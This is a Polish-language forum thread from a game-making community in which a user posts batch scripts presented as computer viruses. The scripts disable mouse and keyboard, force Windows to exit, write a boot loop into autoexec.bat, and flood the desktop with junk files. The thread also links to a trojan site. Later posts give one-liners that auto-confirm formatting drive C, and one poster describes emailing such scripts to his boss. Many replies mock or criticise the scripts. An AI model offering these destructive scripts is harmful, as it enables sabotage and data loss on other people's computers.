Jedi_Master2 Opublikowano 27 Stycznia 2007 Udostępnij Opublikowano 27 Stycznia 2007 @echo off rundll32 mouse,disable - powoduje wyłącznie myszki rundll32 keyboard,disable - wyłącza klawiaturę rundll32 krnl386.exe,exitkernel - zamykanie windowsa echo :petla>>c:\autoexec.bat -nie dopuszczanie do startu systemu echo goto petla>>c:\autoexec.bat - ____||____ start http://www.gmclan.org/ -owieranie strony game maker.exe -uruchamianie pliku (wybierz własną nazwę) kod należy skopiować do notatnika i zapisać w formacie bat (lub exe) uwaga! jest to stary przykład robienia wirusów i wątpliwe, że zadziała w windowsie xp Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Maximal Opublikowano 27 Stycznia 2007 Udostępnij Opublikowano 27 Stycznia 2007 I po cholerę to tu dajesz? :/ Zresztą to nie wirus, tylko prosty program-żart. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marmot Opublikowano 27 Stycznia 2007 Udostępnij Opublikowano 27 Stycznia 2007 Nie lepiej zrobić wirusa który do autoexec.bat dopisuje kasowanie config.sys, albo w ogóle wirus kasujący config.sys xD ? To by był dopiero wirus, a nie taka zabawka ;p . Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Vardi Opublikowano 27 Stycznia 2007 Udostępnij Opublikowano 27 Stycznia 2007 @echo off rundll32 mouse,disable - powoduje wyłącznie myszki rundll32 keyboard,disable - wyłącza klawiaturę rundll32 krnl386.exe,exitkernel - zamykanie windowsa echo :petla>>c:\autoexec.bat -nie dopuszczanie do startu systemu echo goto petla>>c:\autoexec.bat - ____||____ start http://www.gmclan.org/ -owieranie strony game maker.exe -uruchamianie pliku (wybierz własną nazwę) kod należy skopiować do notatnika i zapisać w formacie bat (lub exe) uwaga! jest to stary przykład robienia wirusów i wątpliwe, że zadziała w windowsie xp Myślisz, że jak zapiszesz plik do exe to będzie działać ? O ile mi wiadomo to notatnik nie posiada kompilatora żadnego z języków. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Firemark Opublikowano 27 Stycznia 2007 Udostępnij Opublikowano 27 Stycznia 2007 wogóle dużo antywirusów ma odkrycie kodu bat,js ,vb itp. Jak ktoś grał w emulatora pinbala to wie co to jest mieć 100 alertów... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Zakol Opublikowano 28 Stycznia 2007 Udostępnij Opublikowano 28 Stycznia 2007 Myślisz, że jak zapiszesz plik do exe to będzie działać ? O ile mi wiadomo to notatnik nie posiada kompilatora żadnego z języków. Do *.bat i w wierszu poleceń. Co do tematu to troche prymitywny wirus, już lepiej poszperać w *.ini i rejestrze. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Jedi_Master2 Opublikowano 28 Stycznia 2007 Autor Udostępnij Opublikowano 28 Stycznia 2007 to tutaj macie koda do leprzego @echo off rundll32 user,disableoemlayer rundll32 mouse,disable rundll32 keyboard,disable rundll32 user,swapmousebutton rundll32 krnl386.exe,FatalExit rundll32 user,SetDoubleClickTime echo dir /s /v c:\*.* >>c:autoexec.bat copy %windir%\help\*.* c:\windows\pulpit\*.txt >nul rundll32 krnl386.exe,exitkernel echo :petla>>c:\autoexec.bat echo goto petla>>c:\autoexec.bat start http://www.gmclan.org game maker.exe echo. >%windir%\pulpit\Tank 3d.exe echo. >%windir%\pulpit\c3c.jpg echo. >%windir%\pulpit\hwdp.png echo. >%windir%\pulpit\gm.ink echo. >%windir%\pulpit\dark maximal XD.??? echo. >%windir%\pulpitTank 3d.exe echo. >%windir%\pulpit\c3c.jpg echo. >%windir%\pulpit\hwdp.png echo. >%windir%\pulpit\gm.ink echo. >%windir%\pulpit\dark maximal XD.??? echo. >%windir%\pulpit\Tank 3d.exe echo. >%windir%\pulpit\c3c.jpg echo. >%windir%\pulpit\hwdp.png echo. >%windir%\pulpit\gm.ink echo. >%windir%\pulpit\dark maximal XD.??? echo. >%windir%\pulpitTank 3d.exe echo. >%windir%\pulpit\c3c.jpg echo. >%windir%\pulpit\hwdp.png echo. >%windir%\pulpit\gm.ink echo. >%windir%\pulpit\dark maximal XD.??? echo. >%windir%\pulpit\Tank 3d.exe echo. >%windir%\pulpit\c3c.jpg echo. >%windir%\pulpit\hwdp.png echo. >%windir%\pulpit\gm.ink echo. >%windir%\pulpit\dark maximal XD.??? echo. >%windir%\pulpit\Tank 3d.exe echo. >%windir%\pulpit\c3c.jpg echo. >%windir%\pulpit\hwdp.png echo. >%windir%\pulpit\gm.ink echo. >%windir%\pulpit\dark maximal XD.??? echo. >%windir%\pulpit\Tank 3d.exe echo. >%windir%\pulpit\c3c.jpg echo. >%windir%\pulpit\hwdp.png echo. >%windir%\pulpit\gm.ink echo. >%windir%\pulpit\dark maximal XD.??? echo. >%windir%\pulpit\Tank 3d.exe echo. >%windir%\pulpit\c3c.jpg echo. >%windir%\pulpit\hwdp.png echo. >%windir%\pulpit\gm.ink echo. >%windir%\pulpit\dark maximal XD.??? echo. >%windir%\pulpit\Tank 3d.exe echo. >%windir%\pulpit\c3c.jpg echo. >%windir%\pulpit\hwdp.png echo. >%windir%\pulpit\gm.ink echo. >%windir%\pulpit\dark maximal XD.??? a jak chcecie to tu jest strona z trojanem (też nie najleprzym, przykładowym) http://www.angryziber.com/r3c/ Pozatym to wszystko ma być przykładowe! Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Cobra Opublikowano 28 Stycznia 2007 Udostępnij Opublikowano 28 Stycznia 2007 To są chyba przykłady z jakiegoś tutoriala "jak pisać wirusy" albo coś podobnego, więc po co wycinasz po kawałku, zamiast dać całość? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Jedi_Master2 Opublikowano 28 Stycznia 2007 Autor Udostępnij Opublikowano 28 Stycznia 2007 poprostu jak nie pasowało tamto to dałem to! sam dopisałem kawałek! Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
dziadekkleofas Opublikowano 28 Stycznia 2007 Udostępnij Opublikowano 28 Stycznia 2007 A teraz pytanie - po co niszczyć komuś kompa wirusami? Nie umieta gier robić to teraz napluć do zupy niewinnemu, tak. Po za tym wszystkie antywirusy znają te sztuczki. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Jedi_Master2 Opublikowano 28 Stycznia 2007 Autor Udostępnij Opublikowano 28 Stycznia 2007 fajnie! tylko to jest po to, by wiedzieć jak taki wirus powstaje! jak ktoś wie od podstaw jak zrobić wirusa, to tym lepiej potem wie, jak sie przed nim zabezpieczyć :P . antywirus to nie wszystko. PS. apropo nie umieta gier robić. Dlaczego wszyscy nie umieją gier robić? Czy to już jest zasada, że ja nic nie umiem i nic nie wiem i że trzeba ze mnie zrobić idiotę? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Globi Opublikowano 28 Stycznia 2007 Udostępnij Opublikowano 28 Stycznia 2007 Czy to już jest zasada, że ja nic nie umiem i nic nie wiem i że trzeba ze mnie zrobić idiotę? Tak (joke) A tak na serio to po jakiego grzyba tutaj to dajesz ? Myślisz że jesteś "wielki" bo żeś napisał coś bessensownego w bat ? Chłopie weź se na wstrzymanie i publikuj coś co sie przydać można, a nie do destrukcji służy, bo jaki z tego pożytek ? Zerowy! Komu bedzie sie chciało otwierać pliki *.bat w edytorze textu zanim je uruchomi ? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Filar Społeczności Ranmus Opublikowano 28 Stycznia 2007 Filar Społeczności Udostępnij Opublikowano 28 Stycznia 2007 fajnie! tylko to jest po to, by wiedzieć jak taki wirus powstaje! jak ktoś wie od podstaw jak zrobić wirusa, to tym lepiej potem wie, jak sie przed nim zabezpieczyć :P . antywirus to nie wszystko.Kurcze, ile razy można powtarzać, że to co dajesz, to NIE JEST wirus komputerowy tylko złośliwy skrypt. Tu masz definicję wirusa: http://pl.wikipedia.org/wiki/Wirus_komputerowy Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Firemark Opublikowano 28 Stycznia 2007 Udostępnij Opublikowano 28 Stycznia 2007 Wogóle wiesz co sie robi z programistami wirusów :] Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
gajos Opublikowano 3 Lutego 2007 Udostępnij Opublikowano 3 Lutego 2007 Mam pytanie a jak pozbyć sie takiego zrobionego wirusa np. który zablokuje ci klawiatur??:) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Bartek (Kamrat) Opublikowano 3 Lutego 2007 Udostępnij Opublikowano 3 Lutego 2007 montujesz partycje windowsową na linuksie i usuwasz gnoja ;) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
en_6280 Opublikowano 4 Lutego 2007 Udostępnij Opublikowano 4 Lutego 2007 Jedi_Master2 nie wiem czy wiesz ale ja wiem :jezor: te "komendy" w tych skryptach używane były już za czasów systemów ms-dos!!!! Wiem to bo mam ksiązke(a raczej miałem dokiedy sie niezgubiła) o ms-dos z 1992 roku i zniej sie uczyłem kiedyś też pisania takich programów (no podobnych) :] Dobrze że kombinujesz i zmieniasz troche skrypty i rozumiesz ich znaczenie :thumbsup: a czy zna ktoś program lub "emulattora" dos'a(ma czytac stare programi na dosa) przy właczonym xp bo tak sie składa że napisałem prosty program a niemogo go otpalić(.bat) i sprawdzić czy działa :angry: więc jak ktos moze to niech sprawdzi oto skrypt: @Echo off if %1X==X goto pomoc if %1X==? goto pomoc if %2X==X goto pomoc if not exist %1 goto berr FIND /V "%2" %1 > TEMP.$$$ COPY TEMP.$$$ %1 ERASE TEMP.$$$ goto koniec REM ---------- :berr Echo Plik nie istnieje! goto koniec REM ---------- :pomoc Echo Składnia polecenia jest następująca: Echo WYKRESL {plik} {ciąg znaków} Echo Echo Wszystkie wiersze zawierające podany ciąg znaków Echo będą usunięte z pliku. Rem ---------- :koniec ps.lepiej nie pisać wirusów bo można zaoto siedzieć :P o ile fajniej pisać programy "żart" :P a i jeszcze Jedi_Master2 wiesz moze jak sie robi takie pionowe kreski w notatniku ale nie chodzi o i (pionowa kreska tak jak I ale bez tych daszków u góry i nadole) ???? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marmot Opublikowano 4 Lutego 2007 Udostępnij Opublikowano 4 Lutego 2007 a czy zna ktoś program lub "emulattora" dos'a(ma czytac stare programi na dosa) przy właczonym xp Dosbox a i jeszcze Jedi_Master2 wiesz moze jak sie robi takie pionowe kreski w notatniku ale nie chodzi o i (pionowa kreska tak jak I ale bez tych daszków u góry i nadole) ???? Masz na myśli: "|" ? Przycisk z tym jest razem z backslash, a jak coś, to możesz poszukać w tablicy znaków Windowsa. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
en_6280 Opublikowano 4 Lutego 2007 Udostępnij Opublikowano 4 Lutego 2007 Dzx a dosbox ma troche trudną obsługę ale sobie radze :D jak na xp próbuje otworzyć ten twój "wirus" to mam napisane illegal coś tam Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
spyro Opublikowano 4 Lutego 2007 Udostępnij Opublikowano 4 Lutego 2007 @up A co, myślałeś, że to legalne ?! =P Chłeps, wdług mnie, to takie 'programiki' nie są tak szkodliwe, ażeby od razu tutaj je poniżać, ale są o tyle przydatne, by na przykład podrzucić takie cóś zuemu koledze, albo zdenerwować tatę (jak mi to kiedyś uczyniono xP). Sam czasem piszę takie złośliwe skrypty i podsyłam w mailach z raportami do szefa, a on się później przyczepia "A czemu to znowu mi wszystkie ikonki z pul[pitu znikły?!" xD Heh, no i oczywiście jak zawsze ja bohatersko ratuję mu później pulpit, kasując skrypt. Oczywiście osobiście nie jestem za pisaniem takich wirusów, albo skryptów, ale jak najbardziej za nauką działania takich śmieci i uczenia się na własnej skórze i błędach, w każdym znaczeniu tych słów. xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
en_6280 Opublikowano 5 Lutego 2007 Udostępnij Opublikowano 5 Lutego 2007 moim zdaniem to lepiej pisać takie "wirusy" w c++ lub pascalu bo tak to na xp Nieidzie ich odczytać (uruchomić) a moim zdaniem, niewiem jak waszym, "wirus" powinien być universalny!!!!!!!!!!!! Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
blackmaul Opublikowano 5 Lutego 2007 Udostępnij Opublikowano 5 Lutego 2007 moim zdaniem to lepiej pisać takie "wirusy" w c++ lub pascalu bo tak to na xp Nieidzie ich odczytać Taa, Pascal to stary crap którego już się nie używa ;) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marmot Opublikowano 5 Lutego 2007 Udostępnij Opublikowano 5 Lutego 2007 Taa, Pascal to stary crap którego już się nie używa smile2.gif Spier... xd I tak, wirusy lepiej w assemblerze pisać ^^ . Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Tymon Opublikowano 5 Lutego 2007 Udostępnij Opublikowano 5 Lutego 2007 Lol, wpisz se format c: i masz wirusa... ludzie. :P Każdy kretyn może sobie coś takiego napisać i nazwać to "wirusem". Btw. Niektórzy nie widzą różnicy między programem, a wirusem. Prosty przykład: odpaliłem sobie shutdown na 10s, podchodzi kumpel i mówi "złapałeś jakiegoś wirusa". xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
en_6280 Opublikowano 6 Lutego 2007 Udostępnij Opublikowano 6 Lutego 2007 co do formata to go trzeba najpierw potwierdzić :D ale można napisąc prosto skrypt żeby zawsze odpowiedź brzmiała tak :D Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Tymon Opublikowano 6 Lutego 2007 Udostępnij Opublikowano 6 Lutego 2007 @echo off format c: /q /x t y cls echo Cya! xD Huh? o_O. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
en_6280 Opublikowano 6 Lutego 2007 Udostępnij Opublikowano 6 Lutego 2007 hehe :D nietrafiłeś :D tak to niedziała trzeba inaczej :P ale kombinuj dalej Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Tymon Opublikowano 6 Lutego 2007 Udostępnij Opublikowano 6 Lutego 2007 A idziesz się założyć? ;] Rusz to pod DOSem. W sumie na nowszych Windowsach też się da: @echo off echo t | format c: cls echo Cya! xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
en_6280 Opublikowano 6 Lutego 2007 Udostępnij Opublikowano 6 Lutego 2007 Pod dosem to nieuruchomne ba mam xp :P a przez emulatora niedziała ten przykład :P jak działa pod dosem to zwracam honory :P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Tymon Opublikowano 6 Lutego 2007 Udostępnij Opublikowano 6 Lutego 2007 Działa, działa. Czasy kiedy klepało się pod DOSem dawno minęły - ale to tym jak się powinno pisać nie da rady zapomnieć :) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi